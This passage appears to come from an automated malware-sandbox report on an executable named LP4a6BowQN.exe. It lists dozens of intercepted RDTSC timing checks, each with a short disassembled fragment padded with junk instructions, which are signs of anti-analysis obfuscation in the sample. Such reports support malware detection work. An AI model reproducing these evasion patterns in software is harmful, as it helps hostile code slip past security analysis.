                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01A7 second address: 4AC01AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01AB second address: 4AC01F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushfd 0x0000000e jmp 00007FC8BCFEEF0Ah 0x00000013 and ax, 6FC8h 0x00000018 jmp 00007FC8BCFEEF0Bh 0x0000001d popfd 0x0000001e popad 0x0000001f push ecx 0x00000020 mov edx, 32C60D6Ah 0x00000025 pop ebx 0x00000026 popad 0x00000027 mov dword ptr [esp], ebp 0x0000002a pushad 0x0000002b mov cl, 91h 0x0000002d mov si, bx 0x00000030 popad 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC8BCFEEF0Eh 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC01F9 second address: 4AC0234 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC8BCD07021h 0x00000009 xor eax, 7B55E246h 0x0000000f jmp 00007FC8BCD07021h 0x00000014 popfd 0x00000015 push ecx 0x00000016 pop edi 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a sub esp, 2Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0234 second address: 4AC0238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0238 second address: 4AC023C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC023C second address: 4AC0242 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0242 second address: 4AC028E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov ah, 2Eh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c pushad 0x0000000d movzx esi, dx 0x00000010 mov edx, 4EA89E2Eh 0x00000015 popad 0x00000016 mov dword ptr [esp], ebx 0x00000019 jmp 00007FC8BCD07025h 0x0000001e xchg eax, edi 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007FC8BCD0701Ah 0x00000028 add al, FFFFFFA8h 0x0000002b jmp 00007FC8BCD0701Bh 0x00000030 popfd 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC028E second address: 4AC02AA instructions: 0x00000000 rdtsc 0x00000002 mov edi, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FC8BCFEEF14h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02AA second address: 4AC02DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC8BCD0701Ch 0x0000000d mov si, ED11h 0x00000011 popad 0x00000012 xchg eax, edi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC8BCD07026h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02DE second address: 4AC02E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02E4 second address: 4AC02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02EA second address: 4AC02EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC02EE second address: 4AC02F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC031E second address: 4AC0324 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0324 second address: 4AC0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, 00000000h 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 pushfd 0x00000011 jmp 00007FC8BCD07020h 0x00000016 jmp 00007FC8BCD07025h 0x0000001b popfd 0x0000001c popad 0x0000001d inc ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 pop esi 0x00000021 popad 0x00000022 test al, al 0x00000024 pushad 0x00000025 mov bh, ah 0x00000027 mov bh, C4h 0x00000029 popad 0x0000002a je 00007FC8BCD0728Eh 0x00000030 jmp 00007FC8BCD07022h 0x00000035 lea ecx, dword ptr [ebp-14h] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FC8BCD0701Ah 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0392 second address: 4AC0396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0396 second address: 4AC039C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0417 second address: 4AC041C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC041C second address: 4AC042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD0701Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC042A second address: 4AC042E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC042E second address: 4AC0468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FC8BCD0701Eh 0x0000000e nop 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FC8BCD0701Ch 0x00000018 sbb ecx, 39C71828h 0x0000001e jmp 00007FC8BCD0701Bh 0x00000023 popfd 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC04E2 second address: 4AC0529 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 pushfd 0x00000006 jmp 00007FC8BCFEEF15h 0x0000000b or ecx, 1821D466h 0x00000011 jmp 00007FC8BCFEEF11h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC8BCFEEF0Dh 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0529 second address: 4AC0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FC92DCA4F64h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC8BCD07028h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0560 second address: 4AC0564 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0564 second address: 4AC056A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC056A second address: 4AC0571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0571 second address: 4AC059D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007FC8BCD0707Fh 0x0000000d jmp 00007FC8BCD07024h 0x00000012 cmp dword ptr [ebp-14h], edi 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov esi, edi 0x0000001a push ebx 0x0000001b pop eax 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC059D second address: 4AC05A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC05A3 second address: 4AC05A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC05A7 second address: 4AC061C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FC92DF8CDF2h 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 sbb eax, 10001D88h 0x0000001b jmp 00007FC8BCFEEF0Bh 0x00000020 popfd 0x00000021 pushad 0x00000022 push eax 0x00000023 pop ebx 0x00000024 movzx ecx, dx 0x00000027 popad 0x00000028 popad 0x00000029 mov ebx, dword ptr [ebp+08h] 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movzx esi, bx 0x00000032 pushfd 0x00000033 jmp 00007FC8BCFEEF0Bh 0x00000038 and si, 9A7Eh 0x0000003d jmp 00007FC8BCFEEF19h 0x00000042 popfd 0x00000043 popad 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC061C second address: 4AC0651 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 call 00007FC8BCD07023h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f lea eax, dword ptr [ebp-2Ch] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCD07021h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0651 second address: 4AC0657 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0657 second address: 4AC065D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC065D second address: 4AC0661 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0661 second address: 4AC068D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007FC8BCD07022h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCD0701Eh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC068D second address: 4AC06C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 44E9B414h 0x00000008 mov dl, FDh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, esi 0x0000000e jmp 00007FC8BCFEEF14h 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC8BCFEEF17h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC06C9 second address: 4AC06F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07029h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8BCD0701Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC06F5 second address: 4AC0755 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 pushfd 0x00000007 jmp 00007FC8BCFEEF0Ah 0x0000000c sbb ax, 0BB8h 0x00000011 jmp 00007FC8BCFEEF0Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a nop 0x0000001b jmp 00007FC8BCFEEF16h 0x00000020 xchg eax, ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC8BCFEEF0Dh 0x00000029 pop eax 0x0000002a jmp 00007FC8BCFEEF11h 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0755 second address: 4AC077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 call 00007FC8BCD07028h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC077E second address: 4AC0782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0782 second address: 4AC0786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0786 second address: 4AC078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC078C second address: 4AC07A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, si 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC8BCD0701Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0018 second address: 4AC003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC8BCFEEF0Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC003D second address: 4AC00B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx eax, di 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC8BCD07027h 0x00000015 adc ax, 78FEh 0x0000001a jmp 00007FC8BCD07029h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FC8BCD07020h 0x00000026 add eax, 5E6347F8h 0x0000002c jmp 00007FC8BCD0701Bh 0x00000031 popfd 0x00000032 popad 0x00000033 popad 0x00000034 mov ebp, esp 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00B6 second address: 4AC00BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00BA second address: 4AC00C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00C0 second address: 4AC00D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC00D3 second address: 4AC0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC8BCD07029h 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007FC8BCD07021h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC8BCD0701Dh 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0DBC second address: 4AC0DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0DC0 second address: 4AC0DD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0E6C second address: 4AC0EC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 jmp 00007FC8BCFEEF10h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test al, al 0x00000010 pushad 0x00000011 pushad 0x00000012 mov esi, 222F7383h 0x00000017 pushfd 0x00000018 jmp 00007FC8BCFEEF18h 0x0000001d or ch, 00000048h 0x00000020 jmp 00007FC8BCFEEF0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 popad 0x00000028 je 00007FC92DF729D3h 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0EC4 second address: 4AC0EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0EC8 second address: 4AC0ECC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ECC second address: 4AC0ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ED2 second address: 4AC0ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AC0ED8 second address: 4AC0EFC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [ebp+08h], 00002000h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC8BCD07023h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0AED second address: 4AD0B51 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2BBF3181h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], ebp 0x0000000d jmp 00007FC8BCFEEF0Ch 0x00000012 mov ebp, esp 0x00000014 pushad 0x00000015 mov cl, F7h 0x00000017 mov si, di 0x0000001a popad 0x0000001b push ebp 0x0000001c jmp 00007FC8BCFEEF12h 0x00000021 mov dword ptr [esp], esi 0x00000024 jmp 00007FC8BCFEEF10h 0x00000029 mov esi, dword ptr [ebp+0Ch] 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FC8BCFEEF17h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0B51 second address: 4AD0B69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD07024h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0B69 second address: 4AD0BD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007FC8BCFEEF17h 0x0000000f je 00007FC92DF6C733h 0x00000015 jmp 00007FC8BCFEEF16h 0x0000001a cmp dword ptr [75AB459Ch], 05h 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007FC8BCFEEF0Eh 0x00000028 sbb esi, 08746078h 0x0000002e jmp 00007FC8BCFEEF0Bh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0BD3 second address: 4AD0C01 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC8BCD07024h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007FC92DC9C8C0h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC8BCD0701Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C01 second address: 4AD0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FC8BCFEEF0Dh 0x0000000b jmp 00007FC8BCFEEF0Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, esi 0x00000015 jmp 00007FC8BCFEEF16h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C41 second address: 4AD0C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C45 second address: 4AD0C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF18h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0C61 second address: 4AD0C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0CB8 second address: 4AD0CEC instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC8BCFEEF11h 0x00000012 and cl, 00000056h 0x00000015 jmp 00007FC8BCFEEF11h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0CEC second address: 4AD0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCD07023h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D03 second address: 4AD0D56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC8BCFEEF0Ah 0x00000014 pushfd 0x00000015 jmp 00007FC8BCFEEF12h 0x0000001a and eax, 2E125838h 0x00000020 jmp 00007FC8BCFEEF0Bh 0x00000025 popfd 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D56 second address: 4AD0D5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D5C second address: 4AD0D60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D60 second address: 4AD0D75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC8BCD0701Ah 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D75 second address: 4AD0D87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0D87 second address: 4AD0D8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 4AD0DA5 second address: 4AD0DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Eh 0x00000009 rdtsc
